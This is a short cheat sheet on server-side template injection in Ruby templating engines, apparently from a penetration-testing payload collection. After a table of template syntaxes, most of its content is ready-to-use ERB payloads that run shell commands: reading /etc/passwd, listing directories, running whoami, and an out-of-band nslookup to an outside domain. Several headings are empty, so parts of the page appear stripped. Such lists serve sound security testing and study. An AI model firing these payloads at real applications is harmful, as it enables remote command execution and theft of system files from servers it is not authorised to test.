Server Side Template Injection - Ruby
Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation.
Summary
Templating Libraries
Template Name | Payload Format |
---|---|
Erb | <%= %> |
Erubi | <%= %> |
Erubis | <%= %> |
HAML | #{ } |
Liquid | {{ }} |
Mustache | {{ }} |
Slim | #{ } |
Ruby
Ruby - Basic injections
ERB:
Slim:
Ruby - Retrieve /etc/passwd
Ruby - List files and directories
Ruby - Remote Command execution
Execute code using SSTI for Erb,Erubi,Erubis engine.
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
Execute code using SSTI for Slim engine.